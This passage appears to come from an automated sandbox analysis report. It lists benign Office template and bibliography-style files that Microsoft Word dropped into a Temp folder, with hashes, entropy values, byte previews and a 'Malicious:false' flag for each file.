                                                                                                                                              SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                              MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                              SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                              SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                              SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6929.tmp\CircleProcess.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16806
                                                                                                                                              Entropy (8bit):7.9519793977093505
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                              MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                              SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                              SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                              SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6929.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):254
                                                                                                                                              Entropy (8bit):3.4720677950594836
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                                              MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                                              SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                                              SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                                              SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD693A.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):332
                                                                                                                                              Entropy (8bit):3.547857457374301
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                                                                              SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                                                                              SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                                                                              SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD693A.tmp\harvardanglia2008officeonline.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):284415
                                                                                                                                              Entropy (8bit):5.00549404077789
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                              MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                              SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                              SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                              SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD693B.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):302
                                                                                                                                              Entropy (8bit):3.537169234443227
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                                                                              SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                                                                              SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                                                                              SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD693B.tmp\iso690nmerical.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):217137
                                                                                                                                              Entropy (8bit):5.068335381017074
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                              MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                              SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                              SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                              SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD694B.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):286
                                                                                                                                              Entropy (8bit):3.5502940710609354
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                                                                              SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                                                                              SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                                                                              SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD694B.tmp\iso690.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):270198
                                                                                                                                              Entropy (8bit):5.073814698282113
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                              MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                              SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                              SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                              SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD695C.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):238
                                                                                                                                              Entropy (8bit):3.472155835869843
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                                              MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                                              SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                                              SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                                              SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD695C.tmp\rings.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5151
                                                                                                                                              Entropy (8bit):7.859615916913808
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                              MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                              SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                              SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                              SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD696C.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):374
                                                                                                                                              Entropy (8bit):3.5414485333689694
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                                                                              MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                                                                              SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                                                                              SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                                                                              SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD696C.tmp\Text Sidebar (Annual Report Red and Black design).docx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):47296
                                                                                                                                              Entropy (8bit):6.42327948041841
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                              MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                              SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                              SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                              SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD696D.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):3.5161159456784024
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                                                                              SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                                                                              SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                                                                              SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD696D.tmp\turabian.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):344303
                                                                                                                                              Entropy (8bit):5.023195898304535
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                              MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                              SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                              SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                              SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD699E.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):262
                                                                                                                                              Entropy (8bit):3.4901887319218092
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                                                                              MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                                                                              SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                                                                              SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                                                                              SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD699E.tmp\RadialPictureList.glox

                                                                                                                                              Download File
